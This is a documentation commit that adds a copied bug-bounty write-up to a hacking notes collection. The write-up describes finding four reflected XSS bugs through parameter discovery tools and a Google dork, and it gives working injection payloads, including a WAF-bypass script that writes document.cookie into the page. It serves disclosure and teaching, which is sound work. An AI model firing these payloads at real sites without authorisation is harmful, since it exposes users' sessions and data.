GITBOOK-57: change request with no subject merged in GitBook

SUMMARY.md

@@ -12,5 +12,6 @@
   * [🔎 Deep-Subdomains-Enumeration-Methodology](recon-strategies-by-other-hackers/deep-subdomains-enumeration-methodology.md)
   * [🔎 How I hacked NASA and got 8 bugs ?](recon-strategies-by-other-hackers/how-i-hacked-nasa-and-got-8-bugs.md)
   * [🔎 Simple Recon Methodology](recon-strategies-by-other-hackers/simple-recon-methodology.md)
+  * [🔎 How I was able to find 4 Cross-site scripting (XSS) on vulnerability disclosure program ?](recon-strategies-by-other-hackers/how-i-was-able-to-find-4-cross-site-scripting-xss-on-vulnerability-disclosure-program.md)
 * [🌀 Possible "Content-Type" Header values](possible-content-type-header-values.md)
 * [🎯 XSS nuclei template CVE-2023-24488.yaml](xss-nuclei-template-cve-2023-24488.yaml.md)

recon-strategies-by-other-hackers/how-i-was-able-to-find-4-cross-site-scripting-xss-on-vulnerability-disclosure-program.md

@@ -0,0 +1,140 @@
+---
+description: >-
+  source:
+  https://medium.com/@DrakenKun/how-i-was-able-to-find-4-cross-site-scripting-xss-on-vulnerability-disclosure-program-e2f39199ae16
+---
+
+# 🔎 How I was able to find 4 Cross-site scripting (XSS) on vulnerability disclosure program ?
+
+Hello I’m Amr Mustafa AKA DrakenKun
+
+Today I’ll explain how I found these reflected XSS vulnerabilities
+
+First I will list the tools that I used during this process :-
+
+1. ParamSpider
+2. gau
+3. kxss
+4. Arjun
+
+Let’s say our domain name called **example.com**
+
+I used ParamSpider for finding some interested parameters
+
+```
+python3 paramaspider -d example.com -o parameters.txt 
+```
+
+We got a large number of parameters , now in the final output we can see every reflected parameters and unfiltered values. And here comes the role of kxss tool
+
+I just typed :
+
+```
+cat parameters.txt | kxss 
+```
+
+<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*irL1TTU7md76d0xWoQI-JQ.png" alt="" height="276" width="700"><figcaption><p>some of interested parameters are found here</p></figcaption></figure>
+
+The vulnerable parameter for XSS should have Unfiltered : **\[“ ‘ < > $ | ( ) \` : ; { } ]**
+
+I noticed here that I got 2 interested vulnerable parameters named **“goto”** in different endpoints
+
+let’s say the 2 links are
+
+1. example.com/**login.jsp?goto=**
+
+2\. cloud.example.com/**login.html?goto=**
+
+Just visited the url and injected my simple payload in the parameter
+
+```
+"><img%20src=x%20onerror="alert(%27POC%20By%20DrakenKun%27)"
+```
+
+<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*UjCRvo_RIzM-ZXWk65KDvQ.png" alt="" height="289" width="700"><figcaption><p>javascript alert !</p></figcaption></figure>
+
+Also typed the same payload in the other url and javascript did his job :)
+
+I reported these two vulnerabilities in Bugcrowd with some kind of satisfaction
+
+After exactly 1 day
+
+I asked myself , ok now if you got 2 vulnerable parameters both of them called **“goto“** and possible for XSS
+
+how about try finding more of any parameter has the same name ?!!
+
+I simply used **google dorks**
+
+typed ..
+
+```
+site:"example.com" inurl:"?goto="
+```
+
+I got some results but unfortunately aren’t vulnerable !
+
+gave another chance ..
+
+I used beautiful tool called [**gau**](https://github.com/lc/gau)
+
+get all urls (gau) fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, Common Crawl, and URLScan for any given domain. Inspired by Tomnomnom's [waybackurls](https://github.com/tomnomnom/waybackurls).
+
+Quite simply, all I want is finding any parameter called **“goto”** to get any chance for finding new XSS’s
+
+```
+gau example.com | grep "?goto="
+```
+
+<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*rCgsoUoy0jYlkuuhg2-4Pw.png" alt="" height="69" width="700"><figcaption><p>new results</p></figcaption></figure>
+
+I visited every results and start inject javascript payloads
+
+and guess what happened ?
+
+Yeah :)
+
+got the third XSS with some basic payload to Bypass the WAF
+
+```
+<%2FScriPt><sCripT+class%3DDrakenKun>document.write(document.cookie);<%2FsCriPt>
+```
+
+<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*b6nR2Qwf0fH3cdsdKFv77A.png" alt="" height="86" width="700"><figcaption></figcaption></figure>
+
+<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*eiz-e_C4z6BdmFqwAbYrlg.png" alt="" height="43" width="700"><figcaption><p>the source code</p></figcaption></figure>
+
+Now we got 3 :D
+
+The 3 XSS’s are in 3 different endpoints
+
+I visited them again and start finding any parameters for testing
+
+Here I used tool called **Arjun**
+
+```
+arjun -u example.com/login.jsp
+```
+
+I got some parameters here and start inject every one of them
+
+one of these parameters is called **“SPID”** , I noticed that both characters “< >” are refelcted on the source code !
+
+And I quickly start typing my payload
+
+```
+"><img%20src=x%20onerror="alert(%27POC%20By%20DrakenKun%27)"
+```
+
+And Boom !!
+
+<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*ycO3Nr8k1Y1FlULAm7O72A.png" alt="" height="288" width="700"><figcaption><p>The fourth XSS fires !</p></figcaption></figure>
+
+I tried that with the other endpoints but I found nothing
+
+I reported these 4 vulnerabilities and Alhamdulillah all of them accepted as Unresolved
+
+<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*cD6owwrjYCbtsRJGfRXeeg.png" alt="" height="491" width="700"><figcaption></figcaption></figure>
+
+You can follow me in [twitter ](https://twitter.com/Amr\_MustafaAA)to get some useful informations
+
+Thank U ❤